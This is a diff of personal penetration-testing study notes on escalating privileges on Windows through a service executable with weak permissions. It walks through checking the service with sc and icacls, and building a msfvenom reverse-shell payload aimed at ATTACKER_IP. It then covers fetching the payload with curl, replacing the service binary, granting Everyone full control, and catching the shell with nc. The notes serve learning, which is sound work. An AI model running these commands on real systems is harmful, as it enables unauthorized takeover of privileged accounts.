NischalDaCoder/vapt-learning/notes/VAPT_Notes.md

   - If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, then the attacker can gain the privileges of the service's account.

     		> sc qc SERVICENAME

-	-> As I have mentioned above the key parameters to check for is the binary path name and service start name.
+	 - As I have mentioned above the key parameters to check for is the binary path name and service start name.
 If the service runs as a normal user other than the one we are logged in as, then it can be interesting to check the binary path permissions.

 			> icacls BINARY_PATH_NAME

-	-> If we can spot anything like "Everyone:(I)(M), then it can be confirmed that the service is modifiable, and our current user can e.
+	 - If we can spot anything like "Everyone:(I)(M), then it can be confirmed that the service is modifiable, and our current user can manipulate it.
 So, we can easily overwrite it with any payload of our preference, and the service will execute it with the privilege of the configured user account.

-	-> First, we need to generate a paylaod:
+	 - First, we need to generate a paylaod:

 			$ msfvenom -p windows/x64/shell_reverse_shell_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe-service -o svc.exe

-	-> Then serve a server so that the windows unprivileged user can pull this file.
+	 - Then serve a server so that the windows unprivileged user can pull this file.

 			$ python3 -m http.server

-	-> Pull the payload from the command line.
+	 - Pull the payload from the command line.

 			> curl http://ATTACKER_IP:8000/svc.exe -o svc.exe

-	-> Once the payload is in the Windows server, we need to replace the existing vulnerable service executable with this payload.
+	 - Once the payload is in the Windows server, we need to replace the existing vulnerable service executable with this payload.

 			> cd PATH\TO\VULNERABLE_SERVICE

 			> move VulnerableService.exe VulnerableService.exe.bkp

-	-> Then, we move our payload to this binary path where the service is executed
+	 - Then, we move our payload to this binary path where the service is executed

 			> move PATH\OF\LOWERPRIVUSER\svc.exe VulnerableService.exe

-	-> As, we need to execute our payload from another user, we will give full permission to the Everyone group as well.
+	 - As, we need to execute our payload from another user, we will give full permission to the Everyone group as well.

 			>icacls VulnerableService.exe /grant Everyone:F

-	-> Then, we have to wait for the service to be restarted adn have a listener ready on the attack machine.
+	 - Then, we have to wait for the service to be restarted adn have a listener ready on the attack machine.

 			$ nc -lvnp 4444

-	-> After this vulnerable service gets restarted, we will get a shell of the privileged configured user account on the attack machine.
+	 - After this vulnerable service gets restarted, we will get a shell of the privileged configured user account on the attack machine.

 ### Unquoted Service Paths: